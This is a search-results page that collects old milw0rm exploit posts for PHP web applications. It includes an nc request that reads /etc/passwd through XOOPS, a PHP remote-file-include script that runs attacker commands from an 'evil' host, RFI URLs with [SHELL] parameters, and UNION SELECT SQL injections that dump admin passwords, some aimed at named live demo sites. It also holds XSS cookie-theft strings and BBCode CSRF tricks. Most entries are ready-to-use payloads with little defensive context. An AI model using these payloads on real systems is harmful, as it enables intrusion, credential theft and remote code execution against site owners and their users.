php remote
Search result for 'php remote'
(0.0311191082001 seconds)
daath/XOOPS <= 2.3.3 Remote File Disclosure Vulnerability (.htaccess) ( php)
========================================================================
XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
========================================================================
Affected Software : XOOPS <= 2.3.3
Author : Luca "daath" De Fulgentis - daath[at]nibblesec[dot]org
Advisory number : NS-2009-01
Advisory URL : http://blog.nibblesec.org/advisories/NS-2009-01.txt
Severity : Low/Medium
Local/Remote : Remote
[Summary]
XOOPS is a web application platform written in PHP for the MySQL database.
Its object orientation makes it an ideal tool for developing small or large
community websites, intra company and corporate portals, weblogs and much
more. (Reference : http://www.xoops.org).
Nibble Security discovered a remote arbitrary file retrieval in XOOPS version
2.3.3, which could be exploited to read system or XOOPS configuration files
("mainfile.php").
[Vulnerability Details]
A vulnerable read_file() function can be found in "module_icon.php" under
/xoops_lib/modules/protector/. Here an image icon is read and its full
pathname is constructed using a user-controllable variable called
"$mydirpath" :
=============================================================================
[...]
if( file_exists( $mydirpath.'/module_icon.png' ) ) {
$use_custom_icon = true ;
$icon_fullpath = $mydirpath.'/module_icon.png' ;
} else {
$use_custom_icon = false ;
$icon_fullpath = dirname(__FILE__).'/module_icon.png' ;
}
[...]
} else {
readfile( $icon_fullpath ) ;
}
?>
=============================================================================
If register_globals is enabled and magic_quotes_gpc disabled, it's possible
to control the "$mydirpath" variable content and inject an arbitrary filename
(followed by a NULL byte (%00) to make file_exists() function ignore the
following "/module_icon.png"), resulting in file content inclusion in
application response.
[Proof of Concept Exploit]
Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the
one generated by the vulnerable script). Bacause of this netcat/telnet can be
easily used to exploit this vulnerability :
daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php?
mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80
HTTP/1.1 200 OK
Date: Mon, 16 Mar 2009 19:07:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.1
Expires: Mon, 16 Mar 2009 21:00:00 +0100
Cache-Control: public, max-age=3600
Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100
Content-Length: 1661
Connection: close
Content-Type: image/png
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
daath@shaytan:~$
[Time Table]
17/03/2009 - Vendor notified.
17/03/2009 - Vendor response.
28/05/2009 - Vendor re-contacted (no answer).
16/06/2009 - Public disclosure.
[Legal Notices]
The information in the advisory is believed to be accurate at the
time of publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on, this information.
Permission is hereby granted for the redistribution of this alert,
provided that the content is not altered in any way, except
reformatting, and that due credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html
# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke
# milw0rm.com [2009-06-16]
kezzap66345/AROUNDMe 0.7.7 Multiple Remote File Inclusion Vulnerabilities ( php)
AROUNDMe _0_7_7
*****************
Found by kezzap66345 *
*****************
*****************
Script
Download:http://download.savannah.gnu.org/releases/aroundme/aroundme_0_7_7.tar.gz
*****************
*****************
ERROR#1:
File:\components\core\inc\core_profile.header.php
*****************
include_once($language_path_core . 'inc/me_common.inc.php'); <<< rfi coded
**************************************************************************************
RFI#1:
http://SITE.com/path/aroundme/components/core/inc/core_profile.header.php?language_path_core=[SHELL]
**************************************************************************************
*****************
ERROR#2:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************
<?php
include $template_path_core . "inc/comment.inc.php";
?> <<< rfi coded
**************************************************************************************
RFI#2:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
ERROR#3:
File:/components/core/template/barnraiser_01/default.tpl.php
*****************
include_once($template_path . "inc/menu_" . $section . ".inc.php"); <<< rfi coded
**************************************************************************************
RFI#3:
http://SITE.com/path/components/core/template/barnraiser_01/default.tpl.php?template_path=[SHELL]
**************************************************************************************
*****************
ERROR#4:
File:/components/core/template/barnraiser_01/maint_contact_view.tpl.php
*****************
include($template_path_core . "inc/form_gui_html_editor.inc.php"); <<<
rfi coded
**************************************************************************************
RFI#4:
http://SITE.com/path/components/core/template/barnraiser_01/maint_contact_view.tpl.php?template_path_core=[SHELL]
Thanks:Siircicocuk and x0r0n
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************
# milw0rm.com [2007-04-04]
cr4wl3r/Sports PHool <= 1.0 Remote File Include Exploit ( php)
<?php
/*
Sports PHool <= 1.0 Remote File Include Exploit
Found and c0ded by cr4wl3r @hackb0x
d0rk: no d0rk f0r kiddi0ts
Script: http://sourceforge.net/projects/sportsphool/files/
usage:
target: http://target/sportsphool/includes/layout/plain.footer.php?mainnav=
evil: http://hackb0x/evilscript.txt?
*/
$cmd = $_POST["cmd"];
$target = $_POST["target"];
$evil = $_POST["evil"];
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."target:<br><input type=\"text\" name=\"target\" size=\"90\" value=\"".$target."\"><br>"
."evil:<br><input type=\"text\" name=\"evil\" size=\"90\" value=\"".$evil."\"><br>"
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
if (!isset($_POST['submit']))
{
echo $form;
}else{
$file = fopen ("test.txt", "w+");
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
$file = fopen ($target.$evil, "r");
if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}
echo $form;
while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
}
?>
ITSecTeam/osCMax 2.0 (fckeditor) Remote File Upload ( php)
##############################################################################
#Title: osCMax 2.0 (fckeditor) Remote File Upload #
#Vendor: http://www.oscdox.com #
#Dork: "Powered by osCMax v2.0" , "Copyright @" "RahnemaCo.com" #
##############################################################################
#AUTHOR: ITSecTeam #
#Email: Bug@ITSecTeam.com #
#Website: http://www.itsecteam.com #
#Forum : http://forum.ITSecTeam.com #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability20.htm #
#Thanks: r3dm0v3, limpizik_neo #
##############################################################################
#DESCRIPTION (by vendor):#####################################################
osCMax v2.0 is a powerful e-commerce/shopping cart web application. There are many advantages to using osCMax as your
e-commerce/shopping cart for your web site. It has all the features needed to run a successful internet store and can
be customized to whatever configuration you need.
osCMax v2.0 is based on osCommerce 2.2 RC2a.
#BUG:#########################################################################
file FCKeditor/editor/filemanager/browser/default/connectors/php/config.php:
25: $Config['AllowedExtensions']['File'] = array() ;
26: $Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg') ;
It is still to upload files with some dangerous extensions like php3 !
#EXPLOIT:####################################################################
http://site.com/path_to_oSCMax/FCKeditor/editor/filemanager/browser/default/connectors/test.html
Red-D3v1L/Turnkey Arcade Script (id) Remote SQL Injection Vulnerability ( php)
==============================================================================
## Hackteach.OrG ##
/ ___ )( __ )/ ___ )
\/ ) || ( ) |\/ ) |
/ )| | / | / )
/ / | (/ /) | / /
/ / | / | | / /
/ (_/\| (__) | / (_/\
(_______/(_______)(_______/
==============================================================================
[»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
[»] Arcad site Script <== Remote SQL Injection Vulnerability
==============================================================================
[»] my home: [ Hackteach.org ]
[»] Script: [ Arcad site Script ]
[»] Language: [ PHP ]
[»] Download: [ http://www.turnkeyarcade.com/ ]
[»] Founder: [ Red-D3v1L < php-c0de@hotmail.com > ]
[»] Gr44tz to: [ All member Hackteach.org/cc - Str0ke - sp3x ]
[»] Fuck To : [ Anti-trust << Big Big Big Lamer << ]
########################################################################
===[ Exploit SQL ]===
[»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
[»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--
Author: Red-D3v1L <-
###########################################################################
# milw0rm.com [2009-08-25]
Snakespc/Virtue News (SQL/XSS) Multiple Remote Vulnerabilities ( php)
Viva l'Algérie 3-1 --->Karim Matmour-->Abdel-Kader Ghazal-->Rafik al-Zuhair Jabbur--> Félicitations à tous les Algériens L'Algérie bat l'Egypte 3-1 à aller El akouba pour le retour #-------------------------AllaH AkbaR------------------------------- #Virtue News Multiple Remote Vulnerabilities #------------------------------------------------------------------- #Discovered By: Snakespc ALGERIAN HaCkEr #Mail: snakespc@gmail.com #Site:http://www.snakespc.com/sc/index.php # # les Algériens Kamikaz Wa4rin Fi kol Bla4s #-------------------------SNAKES TEAM------------------------------- #Script:Virtue News # # #http://www.virtuenetz.com/news_manager.php #--------------------------SNAKES TEAM------------------------------ #Exploit: #-------- #Demo:sql #http://www.virtuenetz.com/news/news_detail.php?nid=-2+UNION%20SELECT%201,2,3,password,5,6,7+from+admin-- #Xss #http://www.virtuenetz.com/news/news_detail.php?nid="><script>alert(document.cookie)</script> #-------------------------SNAKES TEAM------------------------------- # Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4 --->Tous les Algériens #--------------------------SNAKES TEAM------------------------------ #ALL www.SnakespC.com/sc>>>> ( Members ) >>>>Str0ke >>>>>>>Milw0rm # milw0rm.com [2009-06-08]
StAkeR/Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities ( php)
+---------------------------------------------------------------------------+
| Woltlab Burning Board 3.0.x Multiple Remote Vulnerabilities |
+---------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| thanks to s3rg3770 |
+---------------------------------------------------------------------------+
# Vulnerabilities: BBCode IMG / XSS / Delete PM / Full Path Disclosure / URL Redirection
# BBCode IMG Tag Script Injection
# [img]http://[host][/img]
# Delete Private Messages (BBCode IMG Tag Script Injection)
# Insert into a (forum message/private message/your signature) the code below:
# [img]http://[host]/[path]/wbb/index.php?page=PM&action=delete&pmID=[ID]&folderID=0[/img]
# The fake image doesn't show errors.
# Cross Site Scripting
# http://[host]/[path]/wcf/acp/dereferrer.php?url=javascript:alert("Example");
# you can bypass the magic_quotes_gpc with String.FromCharCode function.
# URL Redirection
# http://[host]/[path]/wcf/acp/dereferrer.php?url=http://[host]
# http://[host]/[path]/wbb/?page=ThreadAction&action=deleteAll&boardID=1&url=[local URL]
# Full Path Discloscure
# http://[host]/[path]/wbb/index.php?page=[]
# it works on < 3.0.8 version only.
# milw0rm.com [2009-03-09]
SuB-ZeRo/Netref 4.0 Multiple Remote SQL Injection Vulnerabilities ( php)
############### SuB-ZeRo ###############
############### Dz-hackers #################
Netref 4.0 Remote SQL Injection Vulnerability
-----------------------------------------------------------------------------------------------------------
[+]Discovred by : SuB-ZeRo
[+]Vendor URL : www.netref.net
[+]downloader : http://www.phpscripts-fr.net/scripts/download.php?id=627
[+]home: www.sub-z3ro.com / www.h4ck3r-dz.com
[+]ConTacTe: FbH@hotmail.com
[+]DoRk: FiNd It (SoOrY)
[+]exploit:
[+]http://[website]/[script]/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
[+]http://[website]/[script]/presentation.php?id=-1+union+select+1,2,password,4,5,login,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
[+]l!ve demo:
[+]http://netref.net/solutions/fiche_product.php?id=-1+union+select+1,2,password,@@version,5,6,login,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24+from+BDT_USER--
----------------------------------------------------------------------------------------------------------------------
[+]grettz : for my best frinde x.CJP.x / sousn / and all mouslims and eid sa3id for all arabs and mouslimme
----------------------------------------------------------------------------------------------------------------------
sub-z3ro.com sOoN
# milw0rm.com [2008-12-09]
Mr.SQL/5 Star Review (XSS/SQL) Multiple Remote Vulnerabilities ( php)
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## XSS / Remote SQL Injection
##
## Five Star Review ( recommend.php item_id )
##
## http://review-script.com/
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT
##
## Email : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
## -[[: Exploites :]]-
##
## User Exploite >> www.TraGet.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_users+limit+1,1/*
## Admin Exploite >> www.TraGet.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_admin/*
##
## -[[ XSS ]]-
##
## www.TraGet.com/search/index.php?cmd=search&words= [[ XSS ]] &searchWhere=0&mode=normal
##
########################
########################
#########################################################################################################
#########################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: Milw0rM :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
#########################################################################################################
# milw0rm.com [2008-08-24]
Hussin X/ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability ( php)
|___________________________________________________|
|
| ZEEJOBSITE v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html
|
| DorK : inurl:employer_profile.php?compid=
|___________________________________________________|
Exploit:
________
www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
L!VE DEMO:
_________
http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
___________________
Admin LogiN :
www.[target].com/Script/admin/
____________________________( Greetz )____________________________
|
| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
|
| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke
|_________________________________________________________________
Im IRAQi
# milw0rm.com [2008-08-15]
Mr.SQL/Article Friendly Pro/Standard (Cat) Remote SQL Injection Vulnerability ( php)
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability
##
## Article Friendly Pro ( categorydetail.php Cat )
##
## Article Friendly Standard ( authordetail.php autid )
##
## http://www.articlefriendly.com/
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM
##
## Email : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
##
## -[[: Exploites :]]-
##
## [[ Article Friendly Pro ]] www.Target.com/authordetail.php?autid=-1'+union+select+0,0,0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
##
## [[ Article Friendly Standard ]] www.Target.com/categorydetail.php?Cat=1'+and+1=0+union+select+0,CONCAT_WS(0x3a,@@version,user(),datbase),0,0,0,0,0,0/*
##
########################
########################
#######################################################################################################
#######################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
#######################################################################################################
#######################################################################################################
# milw0rm.com [2008-07-30]
Hussin X/Getacoder clone (sb_protype) Remote SQL Injection Vulnerability ( php)
|___________________________________________________|
|
| Getacoder Clone Script (sb_protype) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
|
| script : http://www.greatclone.com/product_info.php?cPath=24&products_id=79
|
| DorK : inurl:"search_form.php?sb_showresult="
|___________________________________________________|
Exploit:
www.[target].com/Script/search_form.php?sb_showresult=1&sb_protype=-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--
L!VE DEMO: :
http://www.demosgreatclone.com/getacoder/search_form.php?sb_showresult=1&sb_protype=-2+UNION+SELECT+1,concat_ws(0x3a,sb_admin_name,sb_pwd),3+from+sbprj_admin--
____________________________( Greetz )____________________________
|
| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
|
| Iraqihack | FAHD | mos_chori | Silic0n
|
|_________________________________________________________________
Im IRAQi
# milw0rm.com [2008-07-27]
Ghost Hacker/EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability ( php)
################################################################################################## EZWebAlbum (dlfilename) Remote File Disclosure Vulnerability |, .-. .-. ,| Found by : Ghost Hacker [ R-H TeaM ] | )(_o/ \o_)( | My Site web : Real-hack.Net |/ /\ \| ################################################################################################## [~] Found by : Ghost Hacker [ R-H TeaM ] [~] Home page : www.Real-hack.net [~] Email : Ghost-r00t@Hotmail.com [~] Name Script : EZWebAlbum [~] Download Script : http://sourceforge.net/projects/ezwebalbum ###################################### [ Viva IslaM & KSA ] ###################################### [~] Error (download.php) : readfile($dlfilename); [~] Exploit : http://xxxx/[path]/download.php?dlfilename=EVIL [~] Example : http://xxxx/[path]/download.php?dlfilename=index.php ###################################### [ Viva IslaM & KSA ] ###################################### [~] Greetz : PROTO & QaTaR BoeZ TeaM & Aseg-Rabe7 & Dmar al3noOoz & 4Bo3tB & LeGeNd HaCkEr & Root Hacker .. Qptan & ScarY.HaCkEr & EgYpTiaNxHaCkEr the-pirate.org & Mr.hope & My Blog[ gh0st10.wordpress.com ] All Members Real Hack And All My Friends .. ################################################################################################## Found by : Ghost Hacker [ R-H TeaM ] ################################################################################################## # milw0rm.com [2008-07-21]
HaCkeR_EgY/Phaos R4000 Version (file) Remote File Disclosure Vulnerability ( php)
####################################################################################
}}} Remote File Disclosure Vulnerability {{{
in (showSource.php) phaos4.0.1
MY HOmE : WWW.PAL-HACkEr.COM WWW.ATSDP.COM
####################################################################################
## AUTHOR : HaCkeR_EgY
## My HoMe : www.PaL-HaCker.com & www.ATSDP.com
## ConTacT : hacker_egy@hotmail.com
-----------------------------------------------
## script: phaos4.0.1
##download:http://sourceforge.net/project/showfiles.php?group_id=111506
###################################################################
### vurn C0dE :
## line 16:
showSource($file, $line, $prev, $next); <=====
function showSource($file, $line, $prev = 10, $next = 10) {
if (!(file_exists($file) && is_file($file))) {
return trigger_error("showSource() failed, file does not exist `$file`", E_USER_ERROR);
return false;
}
//read code
## line 35 : ob_start();
highlight_file($file); <<========
$data = ob_get_contents();
ob_end_clean();
## P0C:
http://localhost/[path]/erorr/showSource.php?file=config_settings.php
#################################################################################
## GREETZ TO : My BrOther and My MasTer " Abo Mohamed " ADMIN PAL-HACKER
## Thanx : F0UaD Pr0gRaMeR , FiReSell , MoHamed EL Arab , Mr.exe , zaradusht , and all " pal-hacker members "
#####################################################################################
# milw0rm.com [2008-04-09]
S.W.A.T./phpsyncml <= 0.1.2 Remote File Include Vulnerabilities ( php)
========================================================================
|| ## ## ## ########## ####### ######## ||
|| ## ## ########## ########## ## ## ## ||
|| #### ########## ## ## ####### ######## ||
|| #### ## ## ## ## ## ####### ## ||
|| ## ## ## ## ## ########## ## ## ## ||
|| ## ## ## ## ## ########## ## ## ######## ||
========================================================================
========================================================================
[*] phpsyncml <= 0.1.2 Remote File Include Vulnerability ||
[!] Application homepage : ||
kent.dl.sourceforge.net/sourceforge/phpsyncml/phpsyncml-0.1.2.tar.bz2 ||
[!] Author : S.W.A.T. ||
[!] Site : wWw.XmorS.CoM ||
[!] Y!ID : Svvateam ||
[!] E-Mail : S.W.4.T@hackermail.CoM ||
[!] Location : Iran - 071 ||
[!] Risk : Moderate ( High ) ||
[!] Dork : :( ||
========================================================================
========================================================================
Vuln. code: wbxml/WBXML/Decoder.php & Encoder.php ||
||
========================================================================
[*] Exploitation : ||
||
[target]/[path]/wbxml/WBXML/Decoder.php?base_dir=[Shell] ||
[target]/[path]/wbxml/WBXML/Encoder.php?base_dir=[Shell] ||
========================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir - ||
[!] The_Editor - Silliconic - Sh3llH3ll ||
||
[!] I Love Xmors & All Member Of Them ||
||
[!] DeltaHackingGroup = ( Lammers Group :D ) ,,!,, ||
||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group ||
||
[!] Tnx 2 : Str0ke - Google - SourceForge ||
========================================================================
# Xmors.Com [2007-09-18]
# milw0rm.com [2007-09-18]